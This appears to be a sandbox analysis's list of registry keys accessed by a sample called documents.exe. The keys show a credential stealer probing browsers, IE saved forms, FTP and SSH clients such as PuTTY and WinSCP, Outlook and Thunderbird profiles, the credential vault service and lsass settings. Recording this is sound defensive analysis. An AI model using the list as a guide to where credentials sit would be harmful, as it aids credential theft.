HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.5.System.Core__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Core,3.5.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1a160f57\2f8d0787 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|documents.exe HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|documents.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|documents.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1a160f57\60438131 HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled HKEY_CURRENT_USER\Software\Classes HKEY_CURRENT_USER\Software\Classes\AppID\documents.exe HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\E115DF6A HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86 HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Pale Moon HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox HKEY_CURRENT_USER\Software\LinasFTP\Site Manager HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings HKEY_CURRENT_USER\Software\Ghisler\Total Commander HKEY_CURRENT_USER\Software HKEY_CURRENT_USER\Software\Adobe HKEY_CURRENT_USER\Software\AppDataLow HKEY_CURRENT_USER\Software\JavaSoft HKEY_CURRENT_USER\Software\Macromedia HKEY_CURRENT_USER\Software\Microsoft HKEY_CURRENT_USER\Software\Netscape HKEY_CURRENT_USER\Software\ODBC HKEY_CURRENT_USER\Software\Policies HKEY_CURRENT_USER\Software\Wow6432Node HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts HKEY_CURRENT_USER\Software\Bitvise\BvSshClient HKEY_CURRENT_USER\Software\VanDyke\SecureFX HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird HKEY_CURRENT_USER\Software\IncrediMail\Identities HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities HKEY_CURRENT_USER\Software\Martin Prikryl HKEY_LOCAL_MACHINE\Software\Martin Prikryl HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail HKEY_CURRENT_USER\Software\WinChips\UserAccounts HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout HKEY_LOCAL_MACHINE\\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd1\x9c\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x92\xef\xbf\xbd\xef\xbf\xbd\xd0\x99\xef\xbf\xbd\xef\xbf\xbd\xd1\x8f\xef\xbf\xbd\xef\xbf\xbd HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir HKEY_USERS\S-1-5-18 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_USERS\.DEFAULT\Environment HKEY_USERS\.DEFAULT\Volatile Environment HKEY_USERS\.DEFAULT\Volatile Environment\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index28 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG 